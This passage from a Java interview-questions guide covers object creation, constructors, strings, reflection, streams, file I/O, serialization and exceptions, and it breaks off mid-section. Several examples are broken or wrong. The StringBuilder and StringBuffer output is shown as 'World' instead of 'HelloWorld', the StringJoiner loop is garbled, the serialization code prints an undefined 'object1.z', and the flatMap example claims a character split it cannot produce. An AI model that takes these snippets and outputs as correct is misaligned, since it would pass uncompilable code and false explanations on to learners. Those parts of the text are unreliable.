args) { try { Class cls = Class.forName("CreateObjectClass"); CreateObjectClass obj = (CreateObjectClass) cls.newInstance(); CreateObjectClass obj1 = (CreateObjectClass) cls.newInstance(); System.out.println(obj); System.out.println(obj1); } catch (ClassNotFoundException e) { e.printStackTrace(); } catch (InstantiationException e) { e.printStackTrace(); } catch (IllegalAccessException e) { e.printStackTrace(); } } } ``` * **Using Clone:** ```java class CreateObjectWithClone implements Cloneable { @Override protected Object clone() throws CloneNotSupportedException { return super.clone(); } int i; static int j = 10; CreateObjectWithClone() { i = j++; } @Override public String toString() { return "Value of i :" + i; } } class MainClass { public static void main(String[] args) { CreateObjectWithClone obj1 = new CreateObjectWithClone(); System.out.println(obj1); try { CreateObjectWithClone obj2 = (CreateObjectWithClone) obj1.clone(); System.out.println(obj2); } catch (CloneNotSupportedException e) { e.printStackTrace(); } } } ``` * **Using ClassLoader** ```java class CreateObjectWithClassLoader { static int j = 10; CreateObjectWithClassLoader() { i = j++; } int i; @Override public String toString() { return "Value of i :" + i; } } public class MainClass { public static void main(String[] args) { CreateObjectWithClassLoader obj = null; try { obj = (CreateObjectWithClassLoader) new MainClass().getClass() .getClassLoader().loadClass("CreateObjectWithClassLoader").newInstance(); // Fully qualified classname should be used. } catch (InstantiationException e) { e.printStackTrace(); } catch (IllegalAccessException e) { e.printStackTrace(); } catch (ClassNotFoundException e) { e.printStackTrace(); } System.out.println(obj); } } ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What are methods of Object Class? The Object class is the parent class of all the classes in java by default. <table class="alt"> <tbody><tr><th>Method</th><th>Description</th></tr> <tr><td>public final Class getClass()</td><td>returns the Class class object of this object. The Class class can further be used to get the metadata of this class.</td></tr> <tr><td>public int hashCode()</td><td> returns the hashcode number for this object.</td></tr> <tr><td>public boolean equals(Object obj)</td><td> compares the given object to this object.</td></tr> <tr><td>protected Object clone() throws CloneNotSupportedException</td><td> creates and returns the exact copy (clone) of this object.</td></tr> <tr><td>public String toString()</td><td> returns the string representation of this object.</td></tr> <tr><td>public final void notify()</td><td> wakes up single thread, waiting on this object\'s monitor.</td></tr> <tr><td>public final void notifyAll()</td><td> wakes up all the threads, waiting on this object\'s monitor.</td></tr> <tr><td>public final void wait(long timeout)throws InterruptedException</td><td> causes the current thread to wait for the specified milliseconds, until another thread notifies (invokes notify() or notifyAll() method).</td></tr> <tr><td>public final void wait(long timeout,int nanos)throws InterruptedException</td><td>causes the current thread to wait for the specified milliseconds and nanoseconds, until another thread notifies (invokes notify() or notifyAll() method).</td></tr> <tr><td>public final void wait()throws InterruptedException</td><td> causes the current thread to wait, until another thread notifies (invokes notify() or notifyAll() method).</td></tr> <tr><td>protected void finalize()throws Throwable</td><td> is invoked by the garbage collector before object is being garbage collected.</td></tr> </tbody></table> <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What is Optional An optional value `Optional`is a container for an object that may or may not contain a value `null`. Such a wrapper is a convenient means of prevention `NullPointerException`, as has some higher-order functions, eliminating the need for repeating `if null/notNullchecks`: ```java Optional < String > optional = Optional.of( " hello " ); optional.isPresent(); // true optional.ifPresent(s -> System.out.println(s.length())); // 5 optional.get(); // "hello" optional.orElse( " ops ... " ); // "hello" ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## # 8. JAVA CONSTRUCTORS <br/> ## Q. How many types of constructors are used in Java? In Java, a constructor is a block of codes similar to the method. It is called when an instance of the class is created. At the time of calling constructor, memory for the object is allocated in the memory. **Types of Java Constructors:** * Default Constructor (or) no-arg Constructor * Parameterized Constructor **Example:** Default Constructor (or) no-arg constructor ```java /** * Default Constructor */ public class Car { Car() { System.out.println("Default Constructor of Car class called"); } public static void main(String args[]) { // Calling the default constructor Car c = new Car(); } } ``` Output ```java Default Constructor of Car class called ``` **Example:** Parameterized Constructor ```java /** * Parameterized Constructor */ public class Car { String carColor; Car(String carColor) { this.carColor = carColor; } public void display() { System.out.println("Color of the Car is : " + carColor); } public static void main(String args[]) { // Calling the parameterized constructor Car c = new Car("Blue"); c.display(); } } ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. How can constructor chaining be done using this keyword? Java constructor chaining is a method of calling one constructor with the help of another while considering the present object. It can be done in 2 ways – * **Within same class**: It can be done using `this()` keyword for constructors in the same class. * **From base class**: By using `super()` keyword to call a constructor from the base class. ```java /** * Constructor Chaining * within same class Using this() keyword */ class Temp { // default constructor 1 // default constructor will call another constructor // using this keyword from same class Temp() { // calls constructor 2 this(5); System.out.println("The Default constructor"); } // parameterized constructor 2 Temp(int x) { // calls constructor 3 this(10, 20); System.out.println(x); } // parameterized constructor 3 Temp(int x, int y) { System.out.println(10 + 20); } public static void main(String args[]) { // invokes default constructor first new Temp(); } } ``` Ouput: ```java 30 10 The Default constructor ``` ```java /** * Constructor Chaining to * other class using super() keyword */ class Base { String name; // constructor 1 Base() { this(""); System.out.println("No-argument constructor of base class"); } // constructor 2 Base(String name) { this.name = name; System.out.println("Calling parameterized constructor of base"); } } class Derived extends Base { // constructor 3 Derived() { System.out.println("No-argument constructor of derived"); } // parameterized constructor 4 Derived(String name) { // invokes base class constructor 2 super(name); System.out.println("Calling parameterized constructor of derived"); } public static void main(String args[]) { // calls parameterized constructor 4 Derived obj = new Derived("test"); // Calls No-argument constructor // Derived obj = new Derived(); } } ``` Output: ```java Calling parameterized constructor of base Calling parameterized constructor of derived ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What is a private constructor? * A constructor with private access specifier/modifier is private constructor. * It is only accessible inside the class by its data members(instance fields,methods,inner classes) and in static block. * Private Constructor be used in **Internal Constructor chaining and Singleton class design pattern** ```java public class MyClass { static{ System.out.println("outer static block.."); new MyClass(); } private MyInner in; { System.out.println("outer instance block.."); //new MyClass(); //private constructor accessbile but bad practive will cause infinite loop } private MyClass(){ System.out.println("outer private constructor.."); } public void getInner(){ System.out.println("outer data member function.."); new MyInner(); } private static class MyInner{ { System.out.println("inner instance block.."); new MyClass(); } MyInner(){ System.out.println("inner constructor.."); } } public static void main(String args[]) { System.out.println("static main method.."); MyClass m=new MyClass(); m.getInner(); } } class Visitor{ { new MyClass();//gives compilation error as MyClass() has private access in MyClass } } ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## # 9. JAVA ARRAY <br/> ## Q. What is copyonwritearraylist in java? * `CopyOnWriteArrayList` class implements `List` and `RandomAccess` interfaces and thus provide all functionalities available in `ArrayList` class. * Using `CopyOnWriteArrayList` is costly for update operations, because each mutation creates a cloned copy of underlying array and add/update element to it. * It is `thread-safe` version of ArrayList. Each thread accessing the list sees its own version of snapshot of backing array created while initializing the iterator for this list. * Because it gets `snapshot` of underlying array while creating iterator, it does not throw `ConcurrentModificationException`. * Mutation operations on iterators (remove, set, and add) are not supported. These methods throw `UnsupportedOperationException`. * CopyOnWriteArrayList is a concurrent `replacement for a synchronized List` and offers better concurrency when iterations outnumber mutations. * It `allows duplicate elements and heterogeneous Objects` (use generics to get compile time errors). * Because it creates a new copy of array everytime iterator is created, `performance is slower than ArrayList`. * We can prefer to use CopyOnWriteArrayList over normal ArrayList in following cases: - When list is to be used in concurrent environemnt. - Iterations outnumber the mutation operations. - Iterators must have snapshot version of list at the time when they were created. - We don\'t want to synchronize the thread access programatically. ```java import java.util.concurrent.CopyOnWriteArrayList; CopyOnWriteArrayList<String> copyOnWriteArrayList = new CopyOnWriteArrayList<String>(); copyOnWriteArrayList.add("captain america"); Iterator it = copyOnWriteArrayList.iterator(); //iterator creates separate snapshot copyOnWriteArrayList.add("iron man"); //doesn't throw ConcurrentModificationException while(it.hasNext()) System.out.println(it.next()); // prints captain america only , since add operation is after returning iterator it = copyOnWriteArrayList.iterator(); //fresh snapshot while(it.hasNext()) System.out.println(it.next()); // prints captain america and iron man, it = copyOnWriteArrayList.iterator(); //fresh snapshot while(it.hasNext()){ System.out.println(it.next()); it.remove(); //mutable operation 'remove' not allowed ,throws UnsupportedOperationException } ArrayList<String> list = new ArrayList<String>(); list.add("A"); Iterator ait = list.iterator(); list.add("B"); // immediately throws ConcurrentModificationException while(ait.hasNext()) System.out.println(ait.next()); ait = list.iterator(); while(ait.hasNext()){ System.out.println(ait.next()); ait.remove(); //mutable operation 'remove' allowed without any exception } ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## # 10. JAVA STRINGS <br/> ## Q. What is the difference between creating String as new() and literal? When you create String object using `new()` operator, it always create a new object in heap memory. On the other hand, if you create object using String literal syntax e.g. "Java", it may return an existing object from String pool ( a cache of String object in Perm gen space, which is now moved to heap space in recent Java release ), if it\'s already exists. Otherwise it will create a new string object and put in string pool for future re-use. **Example:** ```java /** * String literal */ String a = "abc"; String b = "abc"; System.out.println(a == b); // true /** * Using new() */ String c = new String("abc"); String d = new String("abc"); System.out.println(c == d); // false ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What is difference between String, StringBuffer and StringBuilder? **1. Mutability Difference:** `String` is **immutable**, if you try to alter their values, another object gets created, whereas `StringBuffer` and `StringBuilder` are **mutable** so they can change their values. **2. Thread-Safety Difference:** The difference between `StringBuffer` and `StringBuilder` is that StringBuffer is thread-safe. So when the application needs to be run only in a single thread then it is better to use StringBuilder. StringBuilder is more efficient than StringBuffer. **Example:** ```java /** * StringBuffer */ public class BufferTest { public static void main(String[] args) { StringBuffer buffer = new StringBuffer("Hello"); buffer.append(" World"); System.out.println(buffer); } } ``` **Example:** ```java /** * StringBuilder */ public class BuilderTest { public static void main(String[] args) { StringBuilder builder = new StringBuilder("Hello"); builder.append(" World"); System.out.println(builder); } } ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. Why string is immutable in java? The string is Immutable in Java because String objects are cached in String pool. Since cached String literals are shared between multiple clients there is always a risk, where one client\'s action would affect all another client. Since string is immutable it can safely share between many threads and avoid any synchronization issues in java. <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What is Java String Pool? String Pool in java is a pool of Strings stored in Java Heap Memory. String pool helps in saving a lot of space for Java Runtime although it takes more time to create the String. When we use double quotes to create a String, it first looks for String with the same value in the String pool, if found it just returns the reference else it creates a new String in the pool and then returns the reference. However using **new** operator, we force String class to create a new String object in heap space. ```java /** * String Pool */ public class StringPool { public static void main(String[] args) { String s1 = "Java"; String s2 = "Java"; String s3 = new String("Java"); System.out.println("s1 == s2 :" + (s1 == s2)); // true System.out.println("s1 == s3 :" + (s1 == s3)); // false } } ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What is difference between String, StringBuilder and StringBuffer? String is `immutable`, if you try to alter their values, another object gets created, whereas `StringBuffer` and `StringBuilder` are mutable so they can change their values. The difference between `StringBuffer` and `StringBuilder` is that `StringBuffer` is thread-safe. So when the application needs to be run only in a single thread then it is better to use `StringBuilder`. `StringBuilder` is more efficient than StringBuffer. **Situations:** * If your string is not going to change use a String class because a `String` object is immutable. * If your string can change (example: lots of logic and operations in the construction of the string) and will only be accessed from a single thread, using a `StringBuilder` is good enough. * If your string can change, and will be accessed from multiple threads, use a `StringBuffer` because `StringBuffer` is synchronous so you have thread-safety. **Example:** ```java class StringExample { // Concatenates to String public static void concat1(String s1) { s1 = s1 + "World"; } // Concatenates to StringBuilder public static void concat2(StringBuilder s2) { s2.append("World"); } // Concatenates to StringBuffer public static void concat3(StringBuffer s3) { s3.append("World"); } public static void main(String[] args) { String s1 = "Hello"; concat1(s1); // s1 is not changed System.out.println("String: " + s1); StringBuilder s2 = new StringBuilder("Hello"); concat2(s2); // s2 is changed System.out.println("StringBuilder: " + s2); StringBuffer s3 = new StringBuffer("Hello"); concat3(s3); // s3 is changed System.out.println("StringBuffer: " + s3); } } ``` Output ```java String: Hello StringBuilder: World StringBuffer: World ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What is StringJoiner? The class is StringJoinerused to create a sequence of strings separated by a separator with the ability to append a prefix and suffix to the resulting string: ```java StringJoiner joiner = new StringJoiner ( " . " , " Prefix- " , " -suffix " ); for ( String s : " Hello the brave world " . split ( " " )) { , joiner, . add (s); } System.out.println(joiner); // prefix-Hello.the.brave.world-suffix ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## # 11. JAVA REFLECTION <br/> ## Q. What is Java Reflection API? Reflection API in Java is used to manipulate class and its members which include fields, methods, constructor, etc. at **runtime**. The **java.lang.Class** class provides many methods that can be used to get metadata, examine and change the run time behavior of a class. There are 3 ways to get the instance of Class class. * forName() method of Class class * getClass() method of Object class * the .class syntax **1. forName() method:** * is used to load the class dynamically. * returns the instance of Class class. * It should be used if you know the fully qualified name of class.This cannot be used for primitive types. ```java /** * forName() */ class Simple { } class Test { public static void main(String args[]) { Class c = Class.forName("Simple"); System.out.println(c.getName()); } } ``` Output ```java Simple ``` **2. getClass() method:** It returns the instance of Class class. It should be used if you know the type. Moreover, it can be used with primitives. ```java /** * getClass */ class Simple { } class Test { void printName(Object obj) { Class c = obj.getClass(); System.out.println(c.getName()); } public static void main(String args[]) { Simple s = new Simple(); Test t = new Test(); t.printName(s); } } ``` Output ```java Simple ``` **3. The .class syntax:** If a type is available but there is no instance then it is possible to obtain a Class by appending ".class" to the name of the type. It can be used for primitive data type also. ```java /** * .class Syntax */ class Test { public static void main(String args[]) { Class c = boolean.class; System.out.println(c.getName()); Class c2 = Test.class; System.out.println(c2.getName()); } } ``` Output ```java boolean Test ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## # 12. JAVA STREAMS <br/> ## Q. What is Stream? An interface `java.util.Stream` is a sequence of elements on which various operations can be performed. Operations on streams can be either intermediate (intermediate) or final (terminal) . Final operations return a result of a certain type, and intermediate operations return the same stream. Thus, you can build chains of several operations on the same stream. A stream can have any number of calls to intermediate operations and the last call to the final operation. At the same time, all intermediate operations are performed lazily and until the final operation is called, no actions actually happen (similar to creating an object `Thread`or `Runnable`, without a call `start()`). Streams are created based on sources of some, for example, classes from `java.util.Collection`. Associative arrays (maps), for example `HashMap`, are not supported. Operations on streams can be performed both sequentially and in parallel. Streams cannot be reused. As soon as some final operation has been called, the flow is closed. In addition to the universal object, there are special types of streams to work with primitive data types `int`, `long`and `double`: `IntStream`, `LongStream`and `DoubleStream`. These primitive streams work just like regular object streams, but with the following differences: * use specialized lambda expressions, for example, `IntFunction`or `IntPredicate`instead of `Function`and `Predicate`; * support additional end operations `sum()`, `average()`, `mapToObj()`. <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What are the ways to create a stream? * Using collection: ```java Stream < String > fromCollection = Arrays.asList ( " x " , " y " , " z " ).stream (); ``` * Using set of values: ```java Stream < String > fromValues = Stream.of( " x " , " y " , " z " ); ``` * Using Array ```java Stream < String > fromArray = Arrays.stream( new String [] { " x " , " y " , " z " }); ``` * Using file (each line in the file will be a separate element in the stream): ```java Stream < String > fromFile = Files.lines( Paths.get(" input.txt ")); ``` * From the line: ```java IntStream fromString = " 0123456789 " . chars (); ``` * With the help of `Stream.builder()`: ```java Stream < String > fromBuilder = Stream.builder().add (" z ").add(" y ").add(" z ").build (); ``` * Using `Stream.iterate()(infinite)`: ```java Stream < Integer > fromIterate = Stream.iterate ( 1 , n - > n + 1 ); ``` * Using `Stream.generate()(infinite)`: ```java Stream < String > fromGenerate = Stream.generate(() -> " 0 " ); ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What is the difference between `Collection` and `Stream`? Collections allow you to work with elements separately, while streams do not allow this, but instead provides the ability to perform functions on data as one. <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What is the method `collect()`for streams for? A method `collect()`is the final operation that is used to represent the result as a collection or some other data structure. `collect()`accepts an input that contains four stages: * **supplier** — initialization of the battery, * **accumulator** — processing of each element, * **combiner** — connection of two accumulators in parallel execution, * **[finisher]** —a non-mandatory method of the last processing of the accumulator. In Java 8, the class `Collectors` implements several common collectors: * `toList()`, `toCollection()`, `toSet()`- present stream in the form of a list, collection or set; * `toConcurrentMap()`, `toMap()`- allow you to convert the stream to `Map`; * `averagingInt()`, `averagingDouble()`, `averagingLong()`- return the average value; * `summingInt()`, `summingDouble()`, `summingLong()`- returns the sum; * `summarizingInt()`, `summarizingDouble()`, `summarizingLong()`- return SummaryStatisticswith different values of the aggregate; * `partitioningBy()`- divides the collection into two parts according to the condition and returns them as `Map<Boolean, List>`; * `groupingBy()`- divides the collection into several parts and returns `Map<N, List<T>>`; * `mapping()`- Additional value conversions for complex Collectors. There is also the possibility of creating your own collector through `Collector.of()`: ```java Collector < String , a List < String > , a List < String > > toList = Collector.of ( ArrayList :: new , List :: add, (l1, l2) -> {l1 . addAll (l2); return l1; } ); ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. Why do streams use `forEach()`and `forEachOrdered()` methods? * `forEach()` applies a function to each stream object; ordering in parallel execution is not guaranteed; * `forEachOrdered()` applies a function to each stream object while maintaining the order of the elements. <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What are `map()`, `mapToInt()`, `mapToDouble()` and `mapToLong()` methods in Stream? The method `map()`is an intermediate operation, which transforms each element of the stream in a specified way. `mapToInt()`, `mapToDouble()`, `mapToLong()`- analogues `map()`, returns the corresponding numerical stream (ie the stream of numerical primitives): ```java Stream .of ( " 12 " , " 22 " , " 4 " , " 444 " , " 123 " ) .mapToInt ( Integer :: parseInt) .toArray (); // [12, 22, 4, 444, 123] ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What is the purpose of `filter()` method in streams? The method `filter()` is an intermediate operation receiving a predicate that filters all elements, returning only those that match the condition. <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What is the use of `limit()` method in streams? The method `limit()`is an intermediate operation, which allows you to limit the selection to a certain number of first elements. <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What is the use of `sorted()` method in streams? The method `sorted()`is an intermediate operation, which allows you to sort the values ​​either in natural order or by setting Comparator. The order of the elements in the original collection remains untouched - `sorted()`it just creates its sorted representation. <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What streamers designed methods `flatMap()`, `flatMapToInt()`, `flatMapToDouble()`, `flatMapToLong()`? The method `flatMap()` is similar to map, but can create several from one element. Thus, each object will be converted to zero, one or more other objects supported by the stream. The most obvious way to use this operation is to convert container elements using functions that return containers. ```java Stream .of ( " Hello " , " world! " ) .flatMap ((p) -> Arrays.stream (p . split ( " , " ))) .toArray ( String [] :: new ); // ["H", "e", "l", "l", "o", "w", "o", "r", "l", "d", "!"] ``` `flatMapToInt()`, `flatMapToDouble()`, `flatMapToLong()`- are analogues `flatMap()`, returns the corresponding numerical stream. <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What are the final methods of working with streams you know? * `findFirst()` returns the first element * `findAny()` returns any suitable item * `collect()` presentation of results in the form of collections and other data structures * `count()` returns the number of elements * `anyMatch()`returns trueif the condition is satisfied for at least one element * `noneMatch()`returns trueif the condition is not satisfied for any element * `allMatch()`returns trueif the condition is satisfied for all elements * `min()`returns the minimum element, using as a condition Comparator * `max()`returns the maximum element, using as a condition Comparator * `forEach()` applies a function to each object (order is not guaranteed in parallel execution) * `forEachOrdered()` applies a function to each object while preserving the order of elements * `toArray()` returns an array of values * `reduce()`allows you to perform aggregate functions and return a single result. * `sum()` returns the sum of all numbers * `average()` returns the arithmetic mean of all numbers. <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What intermediate methods of working with streams do you know? * `filter()` filters records, returning only records matching the condition; * `skip()` allows you to skip a certain number of elements at the beginning; * `distinct()`returns a stream without duplicates (for a method `equals()`); * `map()` converts each element; * `peek()` returns the same stream, applying a function to each element; * `limit()` allows you to limit the selection to a certain number of first elements; * `sorted()`allows you to sort values ​​either in natural order or by setting `Comparator`; * `mapToInt()`, `mapToDouble()`, `mapToLong()`- analogues `map()`return stream numeric primitives; * `flatMap()`, `flatMapToInt()`, `flatMapToDouble()`, `flatMapToLong()`- similar to `map()`, but can create a single element more. For numerical streams, an additional method is available `mapToObj()`that converts the numerical stream back to the object stream. <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> #### Q. Explain Difference between Collection API and Stream API? *ToDo* <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## # 13. JAVA REGULAR EXPRESSIONS <br/> ## Q. Name some classes present in java.util.regex package? The Java Regex or Regular Expression is an API to define a pattern for searching or manipulating strings. **Regular Expression Package:** * MatchResult interface * Matcher class * Pattern class * PatternSyntaxException class **Example:** ```java /** * Regular Expression */ import java.util.regex.*; public class Index { public static void main(String args[]) { // Pattern, String boolean b = Pattern.matches(".s", "as"); System.out.println("Match: " + b); } } ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## # 14. JAVA FILE HANDLING <br/> ## Q. What is the purpose of using BufferedInputStream and BufferedOutputStream classes? `BufferedInputStream` and `BufferedOutputStream` class is used for buffering an input and output stream while reading and writing, respectively. It internally uses buffer to store data. It adds more efficiency than to write data directly into a stream. So, it makes the performance fast. **Example:** ```java /** * BufferedInputStream */ import java.io.BufferedInputStream; import java.io.File; import java.io.FileInputStream; import java.io.IOException; public class BufferedInputStreamExample { public static void main(String[] args) { File file = new File("file.txt"); FileInputStream fileInputStream = null; BufferedInputStream bufferedInputStream = null; try { fileInputStream = new FileInputStream(file); bufferedInputStream = new BufferedInputStream(fileInputStream); // Create buffer byte[] buffer = new byte[1024]; int bytesRead = 0; while ((bytesRead = bufferedInputStream.read(buffer)) != -1) { System.out.println(new String(buffer, 0, bytesRead)); } } catch (IOException e) { e.printStackTrace(); } finally { try { if (fileInputStream != null) { fileInputStream.close(); } if (bufferedInputStream != null) { bufferedInputStream.close(); } } catch (IOException e) { e.printStackTrace(); } } } } ``` Output ```java This is an example of reading data from file ``` **Example:** ```java /** * BufferedOutputStream */ import java.io.BufferedOutputStream; import java.io.File; import java.io.FileOutputStream; import java.io.IOException; public class BufferedOutputStreamExample { public static void main(String[] args) { File file = new File("outfile.txt"); FileOutputStream fileOutputStream = null; BufferedOutputStream bufferedOutputStream = null; try { fileOutputStream = new FileOutputStream(file); bufferedOutputStream = new BufferedOutputStream(fileOutputStream); bufferedOutputStream.write("This is an example of writing data to a file".getBytes()); bufferedOutputStream.flush(); } catch (IOException e) { e.printStackTrace(); } finally { try { if (fileOutputStream != null) { fileOutputStream.close(); } if (bufferedOutputStream != null) { bufferedOutputStream.close(); } } catch (IOException e) { e.printStackTrace(); } } } } ``` Output ```java This is an example of writing data to a file ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. How to set the Permissions to a file in Java? Java 7 has introduced PosixFilePermission Enum and **java.nio.file.Files** includes a method setPosixFilePermissions( Path path, `Set<PosixFilePermission> perms` ) that can be used to set file permissions easily. **Example:** ```java /** * FilePermissions */ import java.io.File; import java.io.IOException; import java.nio.file.Files; import java.nio.file.Paths; import java.nio.file.attribute.PosixFilePermission; import java.util.HashSet; import java.util.Set; public class FilePermissions { public static void main(String[] args) throws IOException { File file = new File("/Users/file.txt"); // change permission to 777 for all the users // no option for group and others file.setExecutable(true, false); file.setReadable(true, false); file.setWritable(true, false); // using PosixFilePermission to set file permissions 777 Set<PosixFilePermission> perms = new HashSet<PosixFilePermission>(); // add owners permission perms.add(PosixFilePermission.OWNER_READ); perms.add(PosixFilePermission.OWNER_WRITE); perms.add(PosixFilePermission.OWNER_EXECUTE); // add group permissions perms.add(PosixFilePermission.GROUP_READ); perms.add(PosixFilePermission.GROUP_WRITE); perms.add(PosixFilePermission.GROUP_EXECUTE); // add others permissions perms.add(PosixFilePermission.OTHERS_READ); perms.add(PosixFilePermission.OTHERS_WRITE); perms.add(PosixFilePermission.OTHERS_EXECUTE); Files.setPosixFilePermissions(Paths.get("/Users/run.sh"), perms); } } ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. Give the hierarchy of InputStream and OutputStream classes? A stream can be defined as a sequence of data. There are two kinds of Streams − * **InPutStream** − The InputStream is used to read data from a source. * **OutPutStream** − The OutputStream is used for writing data to a destination. **1. Byte Streams:** Java byte streams are used to perform input and output of 8-bit bytes. Though there are many classes related to byte streams but the most frequently used classes are, FileInputStream and FileOutputStream. **Example:** ```java /** * Byte Streams */ import java.io.*; public class CopyFile { public static void main(String args[]) throws IOException { FileInputStream in = null; FileOutputStream out = null; try { in = new FileInputStream("input.txt"); out = new FileOutputStream("output.txt"); int c; while ((c = in.read()) != -1) { out.write(c); } } finally { if (in != null) { in.close(); } if (out != null) { out.close(); } } } } ``` **2. Character Streams:** Java Character streams are used to perform input and output for 16-bit unicode. Though there are many classes related to character streams but the most frequently used classes are, FileReader and FileWriter. **Example:** ```java /** * Character Streams */ import java.io.*; public class CopyFile { public static void main(String args[]) throws IOException { FileReader in = null; FileWriter out = null; try { in = new FileReader("input.txt"); out = new FileWriter("output.txt"); int c; while ((c = in.read()) != -1) { out.write(c); } } finally { if (in != null) { in.close(); } if (out != null) { out.close(); } } } } ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. How serialization works in java? Serialization is a mechanism of converting the state of an object into a byte stream. Deserialization is the reverse process where the byte stream is used to recreate the actual Java object in memory. This mechanism is used to persist the object. **Example:** ```java /** * Serialization and Deserialization */ import java.io.*; class Employee implements Serializable { private static final long serialversionUID = 129348938L; transient int a; static int b; String name; int age; // Default constructor public Employee(String name, int age, int a, int b) { this.name = name; this.age = age; this.a = a; this.b = b; } } public class SerialExample { public static void printdata(Employee object1) { System.out.println("name = " + object1.name); System.out.println("age = " + object1.age); System.out.println("a = " + object1.a); System.out.println("b = " + object1.b); } public static void main(String[] args) { Employee object = new Employee("ab", 20, 2, 1000); String filename = "file.txt"; // Serialization try { // Saving of object in a file FileOutputStream file = new FileOutputStream(filename); ObjectOutputStream out = new ObjectOutputStream(file); // Method for serialization of object out.writeObject(object); out.close(); file.close(); System.out.println("Object has been serialized\n" + "Data before Deserialization."); printdata(object); // value of static variable changed object.b = 2000; } catch (IOException ex) { System.out.println("IOException is caught"); } object = null; // Deserialization try { // Reading the object from a file FileInputStream file = new FileInputStream(filename); ObjectInputStream in = new ObjectInputStream(file); // Method for deserialization of object object = (Employee) in.readObject(); in.close(); file.close(); System.out.println("Object has been deserialized\n" + "Data after Deserialization."); printdata(object); System.out.println("z = " + object1.z); } catch (IOException ex) { System.out.println("IOException is caught"); } catch (ClassNotFoundException ex) { System.out.println("ClassNotFoundException is caught"); } } } ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## # 15. JAVA EXCEPTIONS <br/> ## Q. What are the types of Exceptions? Exception is an error event that can happen during the execution of a program and disrupts its normal flow. **1. Checked Exception**: The classes which directly inherit **Throwable class** except RuntimeException and Error are known as checked exceptions e.g. IOException, SQLException etc. Checked exceptions are checked at compile-time. **2. Unchecked Exception**: The classes which inherit **RuntimeException** are known as unchecked exceptions e.g. ArithmeticException, NullPointerException, ArrayIndexOutOfBoundsException etc. Unchecked exceptions are not checked at compile-time, but they are checked at runtime. **3. Error**: Error is irrecoverable e.g. OutOfMemoryError, VirtualMachineError, AssertionError etc. <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. Explain hierarchy of Java Exception classes? The **java.lang.Throwable** class is the root class of Java Exception hierarchy which is inherited by two subclasses: Exception and Error. <p align="center"> <img src="assets/exception.png" alt="Exception in Java" width="500px" /> </p> **Example:** ```java /** * Exception classes */ import java.io.FileInputStream; import java.io.FileNotFoundException; import java.io.IOException; import java.io.InputStream; public class CustomExceptionExample { public static void main(String[] args) throws MyException { try { processFile("file.txt"); } catch (MyException e) { processErrorCodes(e); } } private static void processErrorCodes(MyException e) throws MyException { switch(e.getErrorCode()){ case "BAD_FILE_TYPE": System.out.println("Bad File Type, notify user"); throw e; case "FILE_NOT_FOUND_EXCEPTION": System.out.println("File Not Found, notify user"); throw e; case "FILE_CLOSE_EXCEPTION": System.out.println("File Close failed, just log it."); break; default: System.out.println("Unknown exception occured," +e.getMessage()); e.printStackTrace(); } } private static void processFile(String file) throws MyException { InputStream fis = null; try { fis = new FileInputStream(file); } catch (FileNotFoundException e) { throw new MyException(e.getMessage(),"FILE_NOT_FOUND_EXCEPTION"); } finally { try { if(fis !=null) fis.close(); } catch (IOException e) { throw new MyException(e.getMessage(),"FILE_CLOSE_EXCEPTION"); } } } } ``` <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. What is difference between Error and Exception? |BASIS FOR COMPARISON |ERROR |EXCEPTION | |-----------------------|-----------------------------------------|----------------------------------------| |Basic |An error is caused due to lack of system resources.|An exception is caused because of the code.| |Recovery |An error is irrecoverable. |An exception is recoverable.| |Keywords |There is no means to handle an error by the program code.| Exceptions are handled using three keywords "try", "catch", and "throw".| |Consequences |As the error is detected the program will terminated abnormally.|As an exception is detected, it is thrown and caught by the "throw" and "catch" keywords correspondingly.| |Types |Errors are classified as unchecked type.|Exceptions are classified as checked or unchecked type.| |Package |In Java, errors are defined "java.lang.Error" package.|In Java, an exceptions are defined in"java.lang.Exception".| |Example |OutOfMemory, StackOverFlow.|Checked Exceptions: NoSuchMethod, ClassNotFound.Unchecked Exceptions: NullPointer, IndexOutOfBounds.| <div align="right"> <b><a href="#related-topics">↥ back to top</a></b> </div> ## Q. Explain about Exception Propagation? An exception is first thrown from the top of the stack and if it is not caught, it drops down the call stack to the previous method, If not caught there, the exception again drops down to the previous method, and so on until they are caught or until they reach the very bottom of the call stack. This is called exception propagation. **Example:** 